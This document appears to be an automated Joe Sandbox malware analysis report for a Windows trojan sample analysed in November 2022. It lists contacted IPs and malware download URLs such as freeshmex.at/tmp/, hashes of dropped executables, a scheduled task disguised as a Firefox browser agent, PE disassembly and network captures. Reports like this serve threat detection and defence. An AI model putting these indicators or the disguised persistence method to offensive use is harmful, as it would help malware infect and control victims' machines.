              		9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvitrue
              95.107.163.44
              		unknownAlbania
              		47394ASC-AL-ASALfalse
              211.53.230.67
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRfalse
              190.140.74.43
              		freeshmex.atPanama
              		18809CableOndaPAtrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:753427
              Start date and time:2022-11-24 20:11:10 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 4s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:file.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winEXE@9/5@35/10
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 70.7% (good quality ratio 58.1%)
              • Quality average: 46%
              • Quality standard deviation: 29.6%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 36
              • Number of non-executed functions: 92
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for rundll32

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              20:13:00Task SchedulerRun new task: Firefox Default Browser Agent 52C9416EC30B0AB4 path: C:\Users\user\AppData\Roaming\gfgsrbs
              20:13:24API Interceptor60x Sleep call for process: rundll32.exe modified
              20:13:39API Interceptor1x Sleep call for process: EBC4.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              178.31.176.42file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              2927fmJPZf.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              e50G9IljDp.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              RJy2nV75ZN.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              gOwRr6jiYd.exeGet hashmaliciousBrowse
              • fresherlights.com/test1/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/
              file.exeGet hashmaliciousBrowse
              • freeshmex.at/tmp/

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              freeshmex.atfile.exeGet hashmaliciousBrowse
              • 175.119.10.231
              file.exeGet hashmaliciousBrowse
              • 186.182.55.44
              file.exeGet hashmaliciousBrowse
              • 123.140.161.243
              file.exeGet hashmaliciousBrowse
              • 211.59.14.90
              file.exeGet hashmaliciousBrowse
              • 190.147.188.50
              XsXlsPXxPG.exeGet hashmaliciousBrowse
              • 190.219.54.242
              2927fmJPZf.exeGet hashmaliciousBrowse
              • 211.59.14.90
              file.exeGet hashmaliciousBrowse
              • 189.143.180.125
              file.exeGet hashmaliciousBrowse
              • 222.236.49.124
              file.exeGet hashmaliciousBrowse
              • 190.117.75.91
              file.exeGet hashmaliciousBrowse
              • 222.236.49.123
              file.exeGet hashmaliciousBrowse
              • 189.143.180.125
              file.exeGet hashmaliciousBrowse
              • 211.40.39.251
              file.exeGet hashmaliciousBrowse
              • 211.171.233.129
              file.exeGet hashmaliciousBrowse
              • 222.236.49.123
              file.exeGet hashmaliciousBrowse
              • 37.34.248.24
              file.exeGet hashmaliciousBrowse
              • 200.46.66.71
              file.exeGet hashmaliciousBrowse
              • 187.233.34.230
              file.exeGet hashmaliciousBrowse
              • 123.213.233.194
              file.exeGet hashmaliciousBrowse
              • 211.171.233.129
              thepokeway.nlfile.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              XsXlsPXxPG.exeGet hashmaliciousBrowse
              • 5.135.247.111
              2927fmJPZf.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              TELENOR-NEXTELTelenorNorgeASNOfile.exeGet hashmaliciousBrowse
              • 178.31.176.42
              file.exeGet hashmaliciousBrowse
              • 178.31.176.42
              2927fmJPZf.exeGet hashmaliciousBrowse
              • 178.31.176.42
              T4IyxAskuY.elfGet hashmaliciousBrowse
              • 148.120.125.124
              HHbpqfGZ8F.dllGet hashmaliciousBrowse
              • 84.219.213.130
              LQag34QR3c.dllGet hashmaliciousBrowse
              • 84.219.213.130
              VmLrezaoZj.dllGet hashmaliciousBrowse
              • 84.219.213.130
              HHbpqfGZ8F.dllGet hashmaliciousBrowse
              • 84.219.213.130
              LQag34QR3c.dllGet hashmaliciousBrowse
              • 84.219.213.130
              VmLrezaoZj.dllGet hashmaliciousBrowse
              • 84.219.213.130
              87uWrdTuhh.elfGet hashmaliciousBrowse
              • 94.234.208.13
              watering.dllGet hashmaliciousBrowse
              • 84.219.213.130
              watering.dllGet hashmaliciousBrowse
              • 84.219.213.130
              9syA1Sm01K.elfGet hashmaliciousBrowse
              • 2.149.125.97
              file.exeGet hashmaliciousBrowse
              • 178.31.176.42
              jGuKZgjBg9.elfGet hashmaliciousBrowse
              • 85.225.253.51
              vf2MKvkv6c.elfGet hashmaliciousBrowse
              • 85.225.253.74
              PSlc8imSQa.elfGet hashmaliciousBrowse
              • 88.89.169.79
              zX8vKJqP7H.elfGet hashmaliciousBrowse
              • 176.75.133.135
              mutinied.dllGet hashmaliciousBrowse
              • 84.219.213.130
              RTDBucharestRomaniaROfile.exeGet hashmaliciousBrowse
              • 109.102.255.230
              file.exeGet hashmaliciousBrowse
              • 109.102.255.230
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.102.255.230
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.102.255.230
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.102.255.230
              file.exeGet hashmaliciousBrowse
              • 109.98.58.98
              bgVmAK2VKL.exeGet hashmaliciousBrowse
              • 109.98.58.98
              file.exeGet hashmaliciousBrowse
              • 109.102.255.230
              93hQ0181ls.exeGet hashmaliciousBrowse
              • 109.98.58.98
              b7tUR4gfU4.exeGet hashmaliciousBrowse
              • 109.98.58.98

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              qsu3KRECRS.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              XsXlsPXxPG.exeGet hashmaliciousBrowse
              • 5.135.247.111
              2927fmJPZf.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111
              SecuriteInfo.com.Riskware.Agent.849.759.exeGet hashmaliciousBrowse
              • 5.135.247.111
              SecuriteInfo.com.Riskware.Agent.849.759.exeGet hashmaliciousBrowse
              • 5.135.247.111
              D41A8BD001FEDA9AD29B5178CB438C2E23FC4FB977592.exeGet hashmaliciousBrowse
              • 5.135.247.111
              file.exeGet hashmaliciousBrowse
              • 5.135.247.111

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpfile.exeGet hashmaliciousBrowse
                file.exeGet hashmaliciousBrowse
                  file.exeGet hashmaliciousBrowse

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\B87E.exe

                    Download File
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1041408
                    Entropy (8bit):7.918015264621188
                    Encrypted:false
                    SSDEEP:24576:K/J3qfaq1RXzqGA+PF6ZbOQVIZc77oReV2U6JjgtA1/lGaee:K/Ja54TS6ZyQKk7cJjJJlGa
                    MD5:1BD9FB4ADE498938E6432D6C5D1E23A5
                    SHA1:909ECEC41F837A402EE4EF43D8B9F6B06A5A8AAF
                    SHA-256:12B8B5BFDE4092B4248ACCC682098222420EE6A0B6DFE89EB268F7FCF8CF00FB
                    SHA-512:EA02AB5EC0BDEABA4E897E5E1E50CCF27AB392AC859348CDF1CAAAF90C7C10F1E99CDD01317F36479CB600B9FE2189F34B59AFC822071EC4C7EA989F8F99CDA5
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L....g.b.....................:0......o............@...........................1.............................................\...d.....1.............................p...............................P<..@............... ............................text............................... ..`.data...../.........................@....rsrc.........1..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\EBC4.exe

                    Download File
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):520192
                    Entropy (8bit):7.765713315963878
                    Encrypted:false
                    SSDEEP:6144:5q6OLJ51HLLQrTYeW0w8Y2hm/UchHJ10kiygcz0CkcScVwAjS0bgF8nlctP4:5qJX1H4rUelw4En0V80WSmjWF8nWt
                    MD5:F06F222962C48BB7D822AC0FCD14CFD2
                    SHA1:0866BE2E6D97E71DEF6DCED9FE5DC7623558DCAD
                    SHA-256:F687250C7F49AAFF9787D9202CD13F5E159220D9AE613B335ED72A76FADFA03F
                    SHA-512:F29B4F4B64394B127F939466AF5D189408C6D296E94469000E72690129753FB0C1232B925C2C50FC252E273E503DEC984EE95BECD267F897B5E57493DD7F6412
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L....3Cb.....................D(......o............@...........................)......C......................................\...d.....).............................p...............................P<..@............... ............................text............................... ..`.data...(.'.........................@....rsrc.........)..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\B87E.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):785408
                    Entropy (8bit):6.878292814763175
                    Encrypted:false
                    SSDEEP:12288:8jrCotmFXRwupVoGK25MAaSOWfvjCqanOxku3lle2kKE:AzmFB3oG1aSbvGqanwRro
                    MD5:D8CA174A8F3F0C225429E1BE1CB6D304
                    SHA1:0F2E738B1A35B6072E1D23894468E45FA7DEE750
                    SHA-256:3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
                    SHA-512:DBF999A9F0399B3CBF93484F2E665E3BEB4DE369DACF4678C7B7B3FF06F45C42879C544C2404D85B88FE3AAACF117A1E28ECB68EE7EA2553B736BAD03619E527
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 24%
                    • Antivirus: Virustotal, Detection: 35%, Browse
                    Joe Sandbox View:
                    • Filename: file.exe, Detection: malicious, Browse
                    • Filename: file.exe, Detection: malicious, Browse
                    • Filename: file.exe, Detection: malicious, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L...v..c...........!.....f..........J........................................ ............@.............................@.......<................................]......................................................@............................text....d.......f.................. ..`.rdata...............j..............@..@.data..../.......0...n..............@....reloc...].......^..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\gfgsrbs

                    Download File
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):192000
                    Entropy (8bit):6.98989950872948
                    Encrypted:false
                    SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
                    MD5:44C87D3BC316EEFE4DCBF66AFED72ABC
                    SHA1:96BDE412EF761B4D53506AE4ED2999BC9DCAF137
                    SHA-256:731E22BE2A6B39304919DC24B750A720B23A0F1ED996A9B74CF0B088DE6144B1
                    SHA-512:2449DA42CF169EF2A9E01ADE64DD8C52AB6037CE9A726597D88F5EEAA726B06F77BC08612AAECCF9354CD23BEE879B1724F222E24C8BAB25FEF7E75A8BF0E0C1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L......`.....................>#......o............@...........................$............................................\...d.....$.............................p...............................P<..@............... ............................text............................... ..`.data.....".........................@....rsrc.........$..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\gfgsrbs:Zone.Identifier

                    Download File
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.98989950872948
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.53%
                    • InstallShield setup (43055/19) 0.43%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:192000
                    MD5:44c87d3bc316eefe4dcbf66afed72abc
                    SHA1:96bde412ef761b4d53506ae4ed2999bc9dcaf137
                    SHA256:731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
                    SHA512:2449da42cf169ef2a9e01ade64dd8c52ab6037ce9a726597d88f5eeaa726b06f77bc08612aaeccf9354cd23bee879b1724f222e24c8bab25fef7e75a8bf0e0c1
                    SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
                    TLSH:CC14BF353680D072C59E65708C60EAA1AB7DAA3155B885377BA80B7E5F703D0AF3634F
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.......................................4...................=...................Rich............................PE..L......`...

                    File Icon

                    Icon Hash:c8d0d8e0f8e0f0e0

                    Static PE Info

                    General

                    Entrypoint:0x406fe6
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x60DF08C1 [Fri Jul 2 12:38:25 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:5a0f5eee1a1d8df02fd40c6cf3174a3d

                    Entrypoint Preview

                    Instruction
                    call 00007F9BE0977256h
                    jmp 00007F9BE096F8DEh
                    mov ecx, dword ptr [esp+04h]
                    test ecx, 00000003h
                    je 00007F9BE096FA86h
                    mov al, byte ptr [ecx]
                    add ecx, 01h
                    test al, al
                    je 00007F9BE096FAB0h
                    test ecx, 00000003h
                    jne 00007F9BE096FA51h
                    add eax, 00000000h
                    lea esp, dword ptr [esp+00000000h]
                    lea esp, dword ptr [esp+00000000h]
                    mov eax, dword ptr [ecx]
                    mov edx, 7EFEFEFFh
                    add edx, eax
                    xor eax, FFFFFFFFh
                    xor eax, edx
                    add ecx, 04h
                    test eax, 81010100h
                    je 00007F9BE096FA4Ah
                    mov eax, dword ptr [ecx-04h]
                    test al, al
                    je 00007F9BE096FA94h
                    test ah, ah
                    je 00007F9BE096FA86h
                    test eax, 00FF0000h
                    je 00007F9BE096FA75h
                    test eax, FF000000h
                    je 00007F9BE096FA64h
                    jmp 00007F9BE096FA2Fh
                    lea eax, dword ptr [ecx-01h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-02h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-03h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-04h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    cmp ecx, dword ptr [0042B970h]
                    jne 00007F9BE096FA64h
                    rep ret
                    jmp 00007F9BE097724Dh
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0042B970h]
                    xor eax, ebp
                    push eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1a05c0x64.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2490000x2ee8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12700x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3c500x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x19cf40x19e00False0.5226637983091788data6.3440620232767975IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x1b0000x22dac80x11c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x2490000x2ee80x3000False0.639892578125data5.694966696037735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2491f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x2498b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x249e200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x24aec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x24b8500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                    RT_ACCELERATOR0x24bd080x98dataRaeto-RomanceSwitzerland
                    RT_GROUP_ICON0x24bcb80x4cdataRaeto-RomanceSwitzerland
                    RT_VERSION0x24bda00x148x86 executable not stripped

                    Imports

                    DLLImport
                    KERNEL32.dllWriteConsoleInputA, EnumDateFormatsA, OpenMutexA, GetConsoleAliasExesLengthW, CopyFileExA, ReadConsoleOutputCharacterA, GetEnvironmentStrings, FreeUserPhysicalPages, QueryDosDeviceA, EnumCalendarInfoExA, GetProcessPriorityBoost, LocalSize, AddConsoleAliasW, CreateFileW, GetMailslotInfo, GetWindowsDirectoryA, GetModuleHandleW, VirtualFree, CreateDirectoryExA, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerW, GetVersionExA, SearchPathA, RequestWakeupLatency, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotW, BuildCommDCBAndTimeoutsA, GetProcAddress, GetModuleHandleA, LocalAlloc, FindNextFileA, TerminateThread, GetCommandLineW, FindFirstChangeNotificationA, VerifyVersionInfoA, DeleteTimerQueue, FindFirstVolumeA, GlobalFlags, GetTickCount, GetACP, GlobalWire, GetTapeParameters, HeapWalk, GetConsoleTitleA, InterlockedCompareExchange, EnumCalendarInfoA, GetNamedPipeHandleStateW, InterlockedDecrement, SetCalendarInfoA, TerminateProcess, MoveFileA, AddAtomW, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointA, VirtualAlloc, SetConsoleActiveScreenBuffer, GetCPInfo, GetProcessIoCounters, GlobalFindAtomA, CreateFileA, CloseHandle, GetVolumeInformationA, EnumSystemCodePagesA, MoveFileWithProgressA, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, GetLastError, DeleteFileA, GetStartupInfoW, HeapAlloc, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetOEMCP, IsValidCodePage, HeapSize, LoadLibraryA, InitializeCriticalSectionAndSpinCount, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, ReadFile
                    USER32.dllGetComboBoxInfo, GetMessageExtraInfo, GetListBoxInfo
                    GDI32.dllGetBoundsRect
                    ADVAPI32.dllSetThreadToken

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    Raeto-RomanceSwitzerland

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2022 20:13:00.179537058 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:00.369390011 CET8049696190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:00.369549036 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:00.375032902 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:00.375082016 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:00.565493107 CET8049696190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:01.250077009 CET8049696190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:01.250516891 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:01.253446102 CET8049696190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:01.256314039 CET4969680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:01.441453934 CET8049696190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:01.503216028 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:01.762573957 CET8049697211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:01.762818098 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:01.762887001 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:01.765835047 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:02.025166035 CET8049697211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:03.711689949 CET8049697211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:03.711747885 CET8049697211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:03.711883068 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:03.711942911 CET4969780192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:03.971602917 CET8049697211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:04.214900970 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:04.464004040 CET8049698211.40.39.251192.168.2.4
                    Nov 24, 2022 20:13:04.464221954 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:04.464222908 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:04.464287996 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:04.713635921 CET8049698211.40.39.251192.168.2.4
                    Nov 24, 2022 20:13:05.402805090 CET8049698211.40.39.251192.168.2.4
                    Nov 24, 2022 20:13:05.402868032 CET8049698211.40.39.251192.168.2.4
